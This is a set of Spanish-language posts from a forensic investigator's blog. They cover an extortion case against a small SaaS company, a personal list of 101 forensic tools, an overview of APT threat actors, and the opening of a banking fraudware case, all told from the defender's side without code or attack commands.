¿De vuelta?

CONEXIONINVERSA

Hola lectores,

Aquí estoy de vuelta, mas  o menos.  No me he muerto, ni he ido a cazar elefantes, ni he desaparecido, tan solo podría decir que es un año de mucho trabajo.

Se que os debo una disculpa por no haber puesto la segunda entrega de Pávlov el zombi. Os aseguro que la tengo casi acabada. No os preocupeis que seguro que sale, solo falta un pequeño paso.

Por lo demás en ConexionInversa estamos trabajando en los mejores casos forenses que haya visto, bien por su espectacularidad o bien por su complejidad técnica. En realidad lo que llevo de año daría para escribir un libro.

A día de hoy voy compaginando el trabajo como puedo con mis conferencias.

En meses pasados estuve liado dando una conferencia en la RootedCoon, a continuación impartí un curso sobre Perito Informático Forense organizado por la Asociación Nacional de Tasadores y Peritos Judiciales Informáticos (Asociación la cual pertenezco) y también en Securmatica organizada por la Revista SIC .

Hoy mientras leéis este post estaré hablando de ciberguerra en Mundo Hacker TV un programa de GlobbTV con gente muy interesante. El Viernes día 11, conferencia en VMUG de la mano de Bitdefender y la semana que viene del 14 al 18 me voy a Sudamérica para los eventos de Infosecurity respectivamente en Lima y Santiago de Chile. ¡¡ Casi na !!

A la vuelta (no lo prometo ;-) ) espero poner la segunda parte de nuestro amigo Pávlov y os comentare algún caso estupendo como 'Bots que roban la identidad a empleados' y 'diversas técnicas de manipulación del software de casinos on-line'.

Pues eso, quería agradecer la espera y vuestra bendita paciencia. También a la cantidad de correos que me habéis enviado con vuestras preguntas y vuestros ánimos. Así que aquí estoy y espero que para siempre dentro de esta magnifica comunidad.

Un saludo

Pedro.

Pávlov el zombie - Un caso de extorsión (I)

Hola lectores,

Arturo y Eli son socios y jóvenes emprendedores dedicados en cuerpo y alma a un proyecto que idearon en la universidad hace cinco años. Se dedican en exclusiva a desarrollar aplicaciones en modo SaaS para empresas en el ámbito de medio ambiente y desde que comenzó el proyecto hoy cuentan con setenta empleados que no es poco en la crisis que vivimos.

El único problema digno de mención surgió hace dos años con un empleado que resaltaba por su brillantez a la hora de programar. Tenia un hueco y futuro en la empresa pero dado su carácter y forma de ser no acepto tener una mujer como responsable de equipo. Con el tiempo las relaciones entre los componentes fueron a peor y Arturo y Eli decidieron tras una gran discusión con este que debería de irse aún perdiendo un estupendo programador. La cosa se hizo de mutuo acuerdo y se despidió.

El tiempo pasa y la vida continua y esta magnífica empresa empieza a dar muy buenos resultados abriendo delegación en Brasil. Arturo y Eli mientras tanto son premiados por la Cámara de Comercio por su buena trayectoria. Deciros que hoy en día esta empresa tiene novios con objeto de ser comprada.

UN ZOMBI EN MI BUZON DE CORREO

El pasado mes de Noviembre Eli recibe un correo con una mala traducción al Español indicando que debe de pagar 90.000€ a una mafia ubicada en Rusia. En caso contrario "Pávlov el Zombie" que es como se hace llamar, le comunica que tras el plazo de siete días procederá a apagar los servidores de la empresa.

Por su puesto Eli, ve en el correo una broma y decide olvidar el asunto hasta que efectivamente al séptimo día y como bien dice ella "se forjo la maldición" y uno de los servidores de Active Directory se apago ordenadamente en plena ebullición de trabajo a las 12:00h.

En estos casos ya sabéis lo que ocurre. El responsable de sistemas empezó a recibir alertas, llamadas de sus compañeros y llamadas desde Brasil. Arturo que es alertado por el móvil no le da importancia y Eli la mínima (estas cosas pasan en todos los días en las empresas, pensó).

Pero la sorpresa fue mayúscula, cuando el administrador  inicio sesión en el servidor y apareció el escritorio, se encontró con una fotografía de Eli con su familia de fondo de pantalla. Algo raro está pasando.

Esa misma mañana deciden reunirse y ver lo ocurrido Eli comenta que fue advertida por un tal "Pávlov" llegando a la conclusión de lo que pensó que era una mal broma la cosa empezaba a convertirse en cruda realidad. Paralelamente en la tarde del suceso Eli recibe más correos de 'Pávlov el Zombie' reclamando el dinero.

Para no hacer muy extenso el post os diré que hasta ahora esto es lo que ocurrió en la empresa y que esto ocurre en Septiembre y que por 'motu' propio de la empresa y tras hablar con sus abogados deciden realizar las siguientes acciones hasta primeros de noviembre:

• Poner una denuncia. La operativa por parte de las fuerzas de seguridad y tras orden judicial se solicita a Google que de información de esa cuenta de correo. Esto además de ser un proceso arduo y duro viene a costar entres uno y tres meses dependiendo del tipo de maldad o fraude cometido.
• Analizar las cabeceras de los correos recibidos (que por cierto son de Gmail)
• Revisar el servidor y puestos de trabajo en busca de troyanos
• Cambiar las contraseñas de todos los dispositivos, servidor y puestos de trabajo

Pero lo peor estaba por venir  en Noviembre "Pávlov" alias "El zombie" reaparece y anunciaba que si no recibía el pago en cinco días antes de las 12:00h del Viernes, procedería a borrar información aleatoriamente del servidor.

Lo que antes fue una advertencia ahora se convertía en un reto dado que se supone que el control lo tiene la empresa.

ESTORNUDAR ES SIMBOLO DE INFECCION ZOMBIE

Bueno, pues lo dicho aquí es donde entramos a colaborar y allí estamos desde el Miércoles. El escenario que nos encontramos es el siguiente:

• Cortafuegos Juniper en alta disponibilidad con balanceador de carga y dos servidores Windows 2008 con Active Directory, IIS publicando varias aplicaciones que se gestionan desde ayuntamientos y otras empresas por medio de una VPN. SQL Server 2008 como base de datos y replicadas en Barcelona en sendos servidores Windows Server 2008.

• Una sospecha por parte de Eli y Arturo, del antiguo empleado que se marcho de la empresa de forma 'poco ejemplar'

• y tres días solo para la hora 'H'

MIERCOLES

Con objeto de monitorizar se realizó (a la puta carrera) lo siguiente (no recuerdo muy bien el orden):

• Se puso el Switch en modo 'port mirroring' en dos 'bocas'. En una de ellas se puso un detector de intrusos paralelamente con Wireshark a saco para capturar tráfico. En la otra se puso Spectrum de NetWitness

• Se aplico una regla en los Juniper con un 'trigger' en log que vigilase todo el tráfico de entrada y salida de los dos servidores y del servidor de OpenVPN.

• Se aplico una regla en los cortafuegos de Windows que comprobase todo el tráfico de salida con objeto de comparar con los Juniper

• Se aplico la última actualización de los servidores (solo había una crítica del navegador) 

• Se desinstalo el antivirus actual y se instalo otro más agresivo y que fuera diferente a los de la red corporativa. Es posible que 'Pávlov' pudiera saltarse la detección del  antivirus si había realizado un malware 'a medida' y mas si sospechamos del antiguo empleado.

• Se hizo pasar la navegación de los servidores por un proxy con autenticación. De esta forma si el atacante utiliza un malware de upsss 'conexión inversa' con algún puerto no estándar quedaría registrado en el proxy y no tendría efecto.

• Se deshabilito el servicio de terminal server (empleado solo por los administradores) y se instalo Wireshark en los servidores (si , ya se que fue un poco bruto). Esto se debe a que si el malware utiliza algún tipo de cifrado, nos sería mas sencillo de ver en la capa de red y usuario que es lo que envía y recibe. Por ultimo instalamos varias utilidades para monitorizar los procesos (decidimos no utilizar los propios del sistema operativo por si este estuviera comprometido) entre ellos Restarter y LogLady. También instalamos un syslog para que nos mandara los eventos de Windows a un pc de la instalación.

• Con el monitor de actividad de SQL Server se comprobó el uso y funcionamiento.

• Un compañero se dedico 'a saco' a revisar posibles vulnerabilidades en los aplicativos web

• Tras diversas discusiones y aun sabiendo que no resultaría muy efectivo se virtualizo en VMware los servidores y sin seguir las recomendaciones de Microsoft (ver) (cosas del modo paranoico)

Y así pasamos un bonito Miércoles...

JUEVES

Vuelta a revisar todo de arriba abajo y de abajo arriba, reuniones y modo paranoico en 'ON'.

VIERNES 8:10h

Me llama Arturo y Eli casi simultáneamente indicando que han vuelto ha recibir un email avisando de que se va a proceder al borrado de datos a la hora indicada. Se informa y adjunta el email a la denuncia que se realizó a las fuerzas de seguridad. Vuelta a re-e-e-e actualizar el antivirus y revisar las actualizaciones de Windows

10:00h

Vuelta a revisar todo. Se estudia la posibilidad de avisar a los clientes, se diseña un protocolo y correo que nunca se llega a enviar. Volvemos a cambiar las contraseñas. La locura se hace evidente.  La dirección de la empresa piensa en apagar los sistemas para que no se produzca el borrado. Es decir hacer un 'haraquiri' o auto-denegación de servicio. Cosa por mi parte inadmisible dado que mueves el problema a otra fecha y no lo resuelves, además de perder datos de investigación muy relevantes. Vuelta hacer Backups por si acaso.

11:00h

Todo el mundo atento. Todo el mundo firmes y en posición de batalla, sensores, Log's y nuestra atención al filtrado de los cortafuegos, proxy's e IDS's

11:28h

Silencio total. Todos mirando el monitor. El 'acojone' y los apretones de tripa 'se huelen'

12:00h

Silencio. Todo funciona con normalidad. No se oye nada de vez en cuando un teléfono. La tecla F5 (actualizar) va 'a toda hostia'

12:05h

Revisión de log's, revisión de controles y vuelta a monitorizar

12:30h

Caras de alegría. El tipo no puede entrar. No tiene control. Todo va normal

13:00h

Alegría tensa. Primera reunión después de DEFCON 1. Pensamos que todo ha sido una 'mala pasada' y que si antes tenia el control ahora es evidente que no lo tiene. Pasamos a DEFCON 2. (Perdón por la jerga militar). Esperamos hasta la hora de comer ya hacemos hasta bromas pero no dejamos de mirar las pantallas

14:30h.

Eli y Arturo nos hacen pedir para todos unas Pizzas y coca colas. Hoy todos comemos en la sala de reuniones. La invitación a una comilona se hace palpable, pero hoy no y como dijo José Mota: mañaaaaaaaana. (NOTA: La comida se produjo pero no tan pronto como nos hubiera gustado)

16:00h.

Todos nos relajamos, el Tsunami no llego a serlo. Mas y mas bromas, somos los mejores

16:22h

LOS ZOMBIES NO DISCRIMINAN, TE COMEN SI VAS LENTO

El administrador de dominio en una copia de datos rutinaria le da error la carpeta de origen. Comprueba alertado que los datos no están. Han desaparecido delante de nuestra cara y estupefacto me quedo al comprobarlo.

También faltan las carpetas de "Archivos de Programa" aunque algunos ficheros no se han borrado debido a que están en uso. Entre los desaparecidos están los ficheros raíz y muchos archivos de la carpeta Windows. Aquí el único que se ha enterado es el visor de eventos de Windows que nos ha enviado el evento a una máquina remota.

FAIL!!!

¿Pero que cojones ha ocurrido?, ¿Como es posible?.

Ninguna alerta, ninguna alarma, el IDS's ni se entera. Los logs's de lo Juniper a cero bytes, ningún proceso ha sido creado, nadie ha tocado nada, las conexiones de red las normales con acceso y peticiones http y https. Ningún tráfico de salida desde los dos servidores y aún así este tipo ha conseguido acceso y borrado datos tal y como predijo.

Las preguntas vuelan y la perplejidad de Eli y Arturo que con la mirada lo dicen todo, hacen ver que la derrota es muy amarga. Aunque los datos se han podido recuperar y realmente ha sido lo de menos,  lo que verdaderamente mas me ha dolido en mi orgullo es que he perdido la apuesta (moral) con esta empresa con un 0-2 para 'Pávlov'. La verdad es que me senti derrotado.

Las dudas y mareos 

¿Me estaré enfrentando realmente a un hacker contratado por la mafia?, ¿Se me ha pasado por alto algún control?, ¿dispone 'Pávlov el zombie' de algún 0Day? o he subestimado el potencial de un ex-empleado...

Es momento de volcar la memoria de los servidores, analizar lo poco que tenemos,volver a recapacitar y revisar con mas profundidad los controles. Cuando se toca fondo solo hay un camino y es tirar hacia arriba.

************

Bueno el resultado técnico final y con pantallas lo tendréis para la semana que viene... no os lo perdáis por que la cosa va por SQL SERVER y no es un ataque web, ni de SQL-Injection ni por asomo un 0day, ni malware que se le parezca. También es la historia de un empeño por descubrir que ha pasado

¿Que será?...

En este mundo de Zombies veremos quien caza a quien...

101 utilidades forenses

Hola lectores,

Estuve revisando el software y hardware que suelo llevarme cuando tengo un caso o intervención en un cliente y he creído conveniente compartir las utilidades que mas suelo emplear o que alguna vez he necesitado. También de paso contesto a los correos en los que me preguntáis por una u otra herramienta.

Quiero decir que este recopilatorio es personal y se basa en aquellas utilidades que suelo emplear o como ya he dicho he precisado alguna vez. Algunas son comerciales y en su mayoría 'Open'. He puesto 101, pero seguro que me dejo alguna.

Estan ordenadas alfabeticamente pero no las he categorizado dado que muchas hacen lo mismo y valen tanto para analizar ordenadores como dispositivos móviles, buscar malware o encontrar evidencias.

Espero que os sean de utilidad.


101 UTILIDADES

	Advanced Prefetch Analyser	Hallan Hay	Lee los ficheros prefetch de Windows. Simplemente genial
	Agent Ransack	Mythicsoft	Busca multiples ficheros usando Perl Regex. Lo he utilizado alguna vez con resultados muy efectivos.
	analyzeMFT	David Kovar	Permite realizar 'Parses' de MFT en sistemas NTFS con objeto de analizarlos con otras herramientas. Lo he utilizado en combinación con EnCase.
	Audit Viewer	Mandiant	Visualizador utilizado en combinación con Memoryze.
	Autopsy	Brian Carrier	Reconocida herramienta gráfica para entornos Linux con muy buen sabor y experiencia en entornos forense. Es otro clásico a utilizar.
	Backtrack	Backtrack	Suite de 'Penetration testing' y seguridad para la realización de auditorias de seguridad. Muy muy bueno.
	Bitpim	Bitpim	Analiza dispositivos móviles como LG, Sanyo, etc.
	Caine	University of Modena e Reggio Emilia	Live CD, con numerosas utilidades y herramientas.
			Analiza tarjetas SIM, direcciones, llamadas, etc.
	ChromeAnalysis	forensic-software	Herramienta que permite el análisis del historico de internet del famoso Google Chrome
	ChromeCacheView	Nirsoft	Lee los ficheros de la cache de Google Chrome y visualiza en una lista lo que se encuentra almacenado.
	DCode	Digital Detective	Convierte varios tipos de fechas y tiempos. Me ha venido bien para los distintos formatos en Unix.
	Defraser	Varios	Detecta ficheros multimedia en espacios 'unallocated'.
	Digital Forensics Framework	ArxSys	Framework que permite el análisis de volumenes, sistemas de ficheros, aplicaciones de usuario, extracción de metadatos, ficheros borrados y ocultos.
	DumpIt	MoonSols	Realiza un volcado de la memoria a fichero. Funciona en 32 y 64 y se puede ejecutar desde un USB
	EDB Viewer	Lepide Software	Visualiza (pero no exporta) ficheros Outlook sin utilizar Exchange Server.
	EnCase	Guidance	Potente herramienta y la mejor de su especie. De reconocido prestigio internacional. Vale para todo en el ámbito forense. Económicamente muy elevada pero muy recomendable. La suelo utilizar
	Encrypted Disk Detector	JAD software	Comprueba discos físicos en busca de ficheros o volumenes cifrados con TrueCrypt, PGP, o Bitlocker.
	Exif Reader	Ryuuji Yoshimoto	Extrae datos(metadatos) Exif de fotografias digitales.
	FastCopy	Shirouzu Hiroaki	Uno de los mas rapidos en copiar y/o borrar, permite utilizar SHA-1. Lo he utilizado para copia masiva de datos con muy buenos resultados
	FAT32 Format	Ridgecrop	Habilita la capacidad de almacenamiento de discos formateados en FAT32
	Foca	Informatica64	Herramienta para fingerprinting e information gathering en trabajos de auditoría web. Lo utilizo para casi todo, especialmente el tema de metadatos
	Forensic Image Viewer	Sanderson Forensics	Visor de varios formatos con posibilidad de extraer metadatos Exif o datos de geolocalización GPS. Lo suelo emplear bastante.
	ForensicUserInfo	Woanware	Extrae información relacionada con los usuarios en Windows utilizando los ficheros SAM, SOFTWARE y SYSTEM hives también desencripta hashes LM/NT.
	FoxAnalysis	forensic-software	Herramienta que permite el análisis del historico de internet de firefox.
	FTK Imager	AccessData	Herramienta para adquirir, montar y analizar de forma básica imágenes de equipos. También es capaz de volcar la memoria a fichero. Muy completa
	Gmail Parser	Woanware	Obtiene de ficheros HTML información que se ha 'cacheado' al utilizar 'artefactos' de Gmail
	HashMyFiles	Nirsoft	Calcula hashes MD5 y SHA.
	Highlighter	Mandiant	Examina ficheros log usando texto, gráficos o histogramas.
	IECacheView	Nirsoft	Lee los ficheros de la cache de Internet Explorer y lo visualiza en una lista.
	IECookiesView	Nirsoft	Extrae detalles de las cookies de Internet Explorer.
	IEHistoryView	Nirsoft	Extrae las visitas recientes de las URL's de Internet Explorer.
	IEPassView	Nirsoft	Extrae las passwords de Internet Explorer en las versiones 4 a 8.
	KaZAlyser	Sanderson Forensics	Extrae información del famoso programa P2P KAZA.
	Live View	CERT	Permite al analista examinar y 'arrancar' imagenes en formato dd y VMware. También muy útil
	LiveContactsView	Nirsoft	Visor que permite exportar los contactos y otros detalles de Windows Live Messenger.
	Mail Viewer	MiTeC	Maravilloso visor de Outlook Express, Windows Mail, Windows Live Mail, Mozilla Thunderbird y ficheros basados en ficheros EML.
	Memoryze	Mandiant	Adquiere y analiza imagenes RAM. Lo bueno es que permite analizar el fichero pagefile en sistemas vivos. Es algo engorroso, pero me encanta.
	MFTview	Sanderson Forensics	Muestra y decodifica contenidos extraídos en ficheros MTF.
	MobaLiveCD	Mobatek	Ejecuta un ISO linux desde windows sin tener que reiniciar. Basado en QEMU. Me ha venido bien en alguna ocasión para utilizar servidores FTP sin tener que tocar windows.
	MobilEdit	MobilEdit	Recoge todos los datos posibles desde el teléfono móvil, a continuación, genera un amplio informe que se puede almacenar o imprimir. Soporta la mayoría de los móviles.
	Motorola Tools		"Flash & Backup" - actualiza el firmware y "M-Explorer" - administrador de archivos pequeños, fáciles de usar y gratis
	MozillaCacheView	Nirsoft	Lee los ficheros de la cache de Mozilla y visualiza en una lista lo que se encuentra almacenado.
	MozillaCookieView	Nirsoft	Extrae detalles de las cookies de Mozilla.
	MozillaHistoryView	Nirsoft	Herramienta que permite el análisis del historico de internet de Mozilla.
	MyLastSearch	Nirsoft	Extrae búsquedas utilizadas en los buscadores mas populares (Google, Yahoo y MSN) también en redes sociales (Twitter, Facebook, MySpace)
	Netdetector	Niksun	Analizador de red y detector de intrusiones
	Netwitness Investigator	Netwitness	Analizador de paquetes de red. Increíblemente bueno.
	NetworkMiner	Netresec	Programa de captura con el fin de detectar los sistemas operativos, las sesiones, los nombres de host, Puertos abiertos, etc.
	Notepad ++	Notepad ++	Ya jamas volveré al notepad clásico después de utilizar este Notepad.
	OperaCacheView	Nirsoft	Lee los ficheros de la cache de Opera y visualiza en una lista lo que se encuentra almacenado.
	OperaPassView	Nirsoft	Desencripta las password del fichero 'wand.dat' de Opera.
	Oxygen	Oxygen	Maravillosa herramienta comercial analiza todos los datos disponibles de un móvil. No puedo vivir si ella.
	P2 eXplorer	Paraben	Realiza montajes virtuales de unidades y de imágenes. Casi toda la suite, por no decir toda es muy interesante y útil.
	P2 Shuttle Free	Paraben	Suite maravillosa que permite montar remotamente discos, captura de tráfico de red, de RAM, utilidades de búsqueda etc.
	Paraben Forensics	Paraben	Al igual que las anteriores, recoge todos los datos posibles desde el teléfono móvil, a continuación, genera un amplio informe que se puede almacenar o imprimir.
	PasswordFox	Nirsoft	Extrae usuario y contraseñas almacenadas en Mozilla Firefox.
	Process Monitor	Microsoft	Examina los procesos windows y permite hacer un seguimiento en tiempo real del registro y accesos a disco. Excelente y genial herramienta
	PST Viewer	Lepide Software	Abre y visualiza (tampoco exporta) ficheros PST sin necesidad de Outlook.
	PsTools	Microsoft	Maravillosa Suite de utilidades en modo comando. Siempre lo llevo encima.
	recuva	Piriform	Has querido recuperar tus ficheros en Windows? Entonces esta es tu utilidad
	Registry Decoder	Digital Forensics Solutions	Para la adquisición, análisis e informe del contenido del registro.
	RegRipper	Harlan Carvey	Herramienta de correlación y extracción de evidencias forenses del registro. Todo un lujo del maestro de los maestros forenses. La utilizo día si y día también.
	Regshot	Regshot	Realiza snapshots del registro con objeto de comparar y ver los cambios que se producen. Ideal para ver que hace un malware.
	rstudio		Es una suite de software de recuperación de datos que puede recuperar archivos de FAT (12-32), NTFS, NTFS 5, + HFS / HFS, FFS, UFS/UFS2 (* BSD, Solaris), ext2/ext3 (Linux
	Shadow Explorer	Shadow Explorer	Visualiza y extrae ficheros de copias shadow. Lo utilizo en busca de malware. Muy bueno.
	SIFT	SANS	VMware Appliance de SANS configurado con multiples herramientas para el análisis forense. Otra tool para llevar encima.
	SkypeLogView	Nirsoft	Analizador del famoso Skype
	Snort	Snort	El mas versatil y magnifico detector de intrusos. Me ha salvado muchas veces del apocalipsis
	SQLite Manager	Mrinal Kant, Tarakant Tripathy	add-on en Firefox que permite ver contenidos de bases de datos SQLite. Otra de las joyas de la corona.
	Strings	Microsoft	No puedo vivir sin el. Busca contenido de texto en ficheros.
	Structred Storage Viewer	MiTec	Visualiza y maneja estructuras basadas en ficheros MS OLE. Lo sigo utilizando.
	Suite Getdata	getdata	Magnifica suite de herramientas forenses para el montaje de discos virtuales, imágenes y recuperación y analisis de datos. Excelente conjunto de herramientas
	Triana Tools	Informatica64	Herramienta indispensable para el análisis forense de IPHONE del magnifico Juanito. Si la quieres te la proporcionan si vas a los cursos
	Ubuntu guide	How-To Geek	Guia para usar con Unbuntu live con objeto de utilizar recuperación de particiones, ficheros, etc. Tengo mala memoria y suelo acudir alguna vez.
	UFED	Cellebrite	Es el sistema más completo que combina la extracción lógica y física, la recuperación de clave de acceso y extracción del sistema de archivos de multiples dispositivos móviles. Es caro pero de lo mejor
	Unhide	Security By default	Me encanta, muy útil en tiempos desesperados, mas si se trata de entornos Linux. Si quieres detectar procesos 'raros' este es tu software
	USB Device Forensics	Woanware	Detalles de las unidades USB que se han conectado a un equipo.
	USB Write Blocker	DSi	Habilita la posibilidad de escribir o bloquear puertos USB.
	USBDeview	Nirsoft	Igual que la anterior.
	UserAssist	Didier Stevens	Muestra una lista de programas que se han ejecutado incluyendo ultima ejecución , número de veces y fechas y horas. Muy bueno.
	VHD Tool	Microsoft	Convierte discos e imágenes al formato VHD que se puede montar en Windows desde el administrador de discos. Me ha sacado de algún apuro
	VideoTriage	QCC	Produce miniaturas de ficheros de video con objeto de apreciar imágenes o movimientos perdidos en la película. Excelente utilidad para mostrar evidencias.
	Volatility Framework	Volatile Systems	Framework que se compone de una colección de herramientas para la extracción de ficheros RAM. Maravillosa herramienta para la detección de Malware. La tengo configurada en SIFT de SANS.
	Web Historian	Mandiant	Magnifica herramienta que reúne las anteriores y permite de los navegadores mas utilizados obtener el historico de navegación.
	Windows File Analyzer	MiTeC	Otra maravillosa suite para analizar ficheros thumbs.db, Prefetch, INFO2 y .lnk. Como os podeis imaginar lo empleo muchísimo.
	Windows Forensic Environment	Troy Larson	Guia de Brett Shavers para crear y trabajar con un CD que arranque un Windows (Similar a windows PE).
	Wireshark	Wireshark	Algo que decir de esta maravillosa herramienta?. Excepcional!!
	Xplico	xplico	Entorno gráfico para poder entender y visualizar el contenido de ficheros PCAP. Muy útil!!

	OSforensics	Osforensics	Una forma rapida de investigar el contenido de ficheros borrados, último acceso. Muy útil si tienes prisa y el equipo no es necesario aportarlo para una evidencia.

	Responder	HBgary	Convierte la memoria RAM a disco y reconstruye todas las estructuras de datos subyacentes de hasta 6 gigabytes de RAM.

	Liveview	Liveview	Es una herramienta basada en Java que crea una máquina virtual de VMware de una imagen de disco sin procesar (dd-style) o un disco físico. Muy buena!!

De cabañas y otras cositas...

Hola lectores,

Este fin de semana nos vamos para el Escorial para realizar el <aseguraITCamp3>, ya que por segundo año (consecutivo para mi) y gracias a Chema Alonso (si, un tipo que le gusta la ecología y no hace mas que hablar y hablar de las FOCAs) me ha permitido impartir una conferencia (de la mano de Bitdefender) sobre Advanced persistent threat (APT). Una novedosa e insidiosa forma de atacar empresas sin que te des cuenta de que te han robado lo más intimo de tu compañía. Muchos ya lo habreís leido en el blog, pero aquí lo ampliaré con otros casos que han ocurrido en España.

Voy a ir acompañado de 'Horatiu Bandiou' de Bitdefender. Un tipo rudo, con pinta de mafioso y especialista en armamento y en desarmarte en menos que respiras. Además es un crack en seguridad informática y que ha trabajado para lo mejorcito y peorcito de los gobiernos de Europa,  también y sin que esto no signifique nada es Rumano ;-)

Ya sabes o vienes a esta conferencia o te parte las piernas...

Nos vemos amigos...!!

El fraude-ware te vigila. Otro de APT

Hola lectores,

Parece ser que el último post sobre ataques persistentes ha tenido bastante movimiento y muchos de vosotros me habéis solicitado en muchos correos mas detalles sobre este nuevo tipo de ataque. Como todavía no puedo facilitaros mas información voy a dar una visión mas general de como es el mapa de este tipo de ataques.

Durante muchos años, los piratas informáticos operan desde China  (sean o no responsables) y han estado atacando a un gran número de sistemas comerciales y gubernamentales aquí en España y en el extranjero.

En la última conferencia de la NcN en Barcelona, hablé veladamente de ello y quisiera destacar una entrevista en el periódico el País que le hizo a Luis Jiménez, responsable de la seguridad electrónica del servicio de inteligencia del CNI y en la que cito literalmente lo que dijo:  "España fue blanco de más de 40 ataques "graves", varias instituciones clave fueron tocadas. Cuatro de los 40 ataques alcanzaron al CNI: dos de ellos, al Centro Criptológico Nacional."

Extracto de la entrevista

Otra de las perlas es este gazapo de la televisión estatal China que en una emisión en directo del canal 7 (CCTV 7) en el Instituto Militar del PCCh (partido comunista) muestran en una pantalla los ataques dirigidos a través de Internet a sitios Web.

En la pantalla se puede mal apreciar una dirección IP: 138.26.72.17

Que buscando por geo-localizacion nos encontramos esto:

¿Que estarán haciendo los Chinos en Alabama?

Vamos mas claro y en botella 'agua'.

MAPA DE ACTORES

Viendo los diferentes casos en los que he colaborado mas o menos podría decir que existen varios escenarios:

• Mafias - Advanced Persistent Threats
• Espionaje Industrial - Advanced Persistent Threats
• Ciberguerra - Advanced Persistent Threats

De ahora en adelante APT, vamos a empezar con la primera:

MAFIAS - APT

Su objetivo es obtener beneficios económicos de forma rápida atacando y/o troyanizando al usuario de una entidad financiera. Como si de una empresa se tratase, consiguen realizar toda una cadena de desarrollo, producción , venta y explotación.

En la imagen anterior aparecen los siguientes actores:

Desarrollador de exploits:  Es la persona(as) que disponen de la técnica suficiente para la elaboración del malware, no tiene que ser una persona y muchas veces se compone de un equipo que va de tres a cinco programadores. Su precio oscila entre los 10.000€ y 20.000€ dependiendo si desarrolla un 0 Day o consigue un malware indetectable en el tiempo. También se cobra más si es remoto y todavía más caro si afecta a los navegadores de los usuarios.

Vendedor de exploits & packs: Al igual que el desarrollador de exploits puede ser desde una persona a un equipo. En los casos que he visto pueden ser los mismos integrantes del equipo que desarrolla una forma 'paquetizada' de su producto. También son los que dan 'soporte' a la venta y/o actualizaciones. Pueden ganar entre 1.000€ y 3.000€ dependiendo de su integración y conocimiento del producto con los desarrolladores.

Vendedor de Bots: Vendría a ser la figura del 'account manager' de cualquier empresa normal, controlan el canal de venta y aunque parezca mentira, su producto estrella no es la venta de 'bots', es la venta de identidad digital, obviamente robada anteriormente. Con esta identidad falsifican tarjetas de crédito y compran dominios que a su vez hospedan y venden. Su figura en todo este proceso es ser transparente, por no decir invisible. Es muy difícil involucrarlo ante la justicia por falta de evidencias. También se dedican a la venta de pornografía infantil. 

Es el actor que más dinero gana de la cadena dada su versatilidad en 'otros productos'.

Botmaster y Recolector de cuentas: Son los compradores finales, que pueden ser las mismas mafias que han 'contratado' el desarrollo del 'producto' o bien entidades menores como grupos organizados o pequeñas mafias. El recolector de cuentas puede ser una persona o grupo que dispone de una gran base de datos de cuentas de correo, preferiblemente de entidades financieras. Su posición es arriesgada dado que son la cabeza visible del ataque o de la gestión del panel de control.

Muleros: Como ya sabréis son los encargados de obtener el dinero fisicamente desde su propia cuenta corriente quedando un margen disponible del montante para el. Suelen ser los primeros que las fuerzas de seguridad atrapan dada su exposición fisicamente a la hora de personarse en la entidad financiera.

Víctimas: 'Sin comentarios'. 

ESPIONAJE INDUSTRIAL - APT

Muy de moda hoy en día sobre todo en epoca de crisis. Muchas empresas no tienen lo suficiente para invertir en I+D y sale mas rentable 'fotocopiarselo' a la competencia.

Su objetivo es disponer de más información que la competencia y aquí entramos en la guerra de guerrillas, vale todo desde información financiera, documentos confidenciales y planos hasta información privada y si es comprometedora mucho mejor. Esto les da ventaja en la carrera.

Los actores apenas han cambiado, tan solo desaparece el vendedor de bots dado que su relación es ahora mucho mas directa y confidencial entre los que piden 'hazme un troyano para la empresa x' y los que lo desarrollan. Los precios aumentan dado que su exposición es mas directa y facil de poder llegar a descubrir (dependiendo de como es la empresa).

Tan solo destacar o diferenciar que la información obtenida no tiene valor en el mercado solo beneficia a la empresa que lo contrata. Los actores y el canal de distribución es idéntico que en la primera imagen.

CIBERGUERRA - APT

LLeva años durmiendo veladamente, aunque la realidad es que ha despertado con fuerza. Aquí los amos o por lo menos los mas señalados como ciber-agresores es China.

El anonimato difumina al enemigo y la complejidad de las redes hace imposible controlar el alcance de una acción ofensiva.

Se ha visto en los ataques contra Estonia, contra Georgia y en julio de 2009, contra Corea del Sur y Estados Unidos: los ataques no venían de un solo sitio sino de decenas, incluidos los países víctimas. Eran ordenadores personales secuestrados mediante malware que esconden la verdadera identidad del enemigo.

El objetivo de estos hackers de los distintos países no es otro que disponer de información y tener control de actividades, información diplomática y si llega el caso el poder de activar o desactivar ciertas defensas de los países atacados.

Aquí los actores al igual que las anteriores imágenes varían poco, salvo que son 'financiados' por los ejércitos especializados. En este caso la cadena de distribución llega hasta el botmaster.

También otro nuevo escenario entra a formar parte de la vida cotidiana. El grupo Anonymous empieza a atacar tanto a gobiernos, instituciones y empresas privadas con objeto de reivindicar un cambio en la sociedad.

Por lo tanto el mapa queda de la siguiente forma:

Como vemos hay muchos componentes y quízas me olvide alguno, pero podemos decir que están casi todos, muchos de ellos son los que están dejando en ridículo a fuerzas de seguridad, empresas y hasta los mismos Gobiernos. La batalla no ha hecho más que comenzar.

Siguiendo con el anterior post sobre APT he querido mostrar un curioso ataque que duró cierto tiempo y que nos tuvo un mes bastante ocupaditos.

 MAFIA - Advanced Persistent Threats - ·Vigila que te vigilan"

Bueno, dado este punto vamos a ver un caso real de un ataque APT sobre una entidad financiera. Este caso lo suelo exponer con un vídeo cuando estoy dando alguna conferencia. En el post voy a poner solo pantallas dado que el vídeo carece de explicación y por lo tanto es más difícil entenderlo. También decir que este ataque ya no tiene efecto dado que se han tomado las medidas oportunas y por otro lado los números de cuenta de las pantallas ya no existen. 

Este caso es lo que se denomina un ataque a medida y realizado en exclusiva para una determinada entidad financiera, es decir los atacantes se han tomado la molestia de ir a una oficina bancaria y abrir una cuenta para ver el funcionamiento de la banca electrónica. Para ello habrán analizado las entradas y salidas, la gestión de errores, vulnerabilidad si las hubiera, etc. etc.

Una vez observado el funcionamiento el equipo APT se pone a desarrollar el malware.

OBJETIVO:  Conseguir dinero de una forma fácil. 

MODUS OPERANDI:  Cuando se realiza una trasferencia económica de una cuenta a otra, el malware cambia la cuenta de destino por un 'pool' de número de cuentas maliciosas o de muleros ubicados en otros países. ¡¡Ahí es ná!!

DISTRIBUCION: Utilizan el método clásico del Phising

TIPO DE MALWARE: En concreto este 'bicho' (realmente no es un malware sería mejor llamarlo 'fraudeware') no es detectado por ningún antivirus por una cosa que es obvia, realmente las acciones del 'bicho' no crean procesos ocultos, ni ficheros, ni almacena contraseñas, tan solo modifica el post de envio, por lo tanto es innocuo, incoloro e inodoro para los antivirus. (simplemente perfecto).

EMPEZAMOS!!
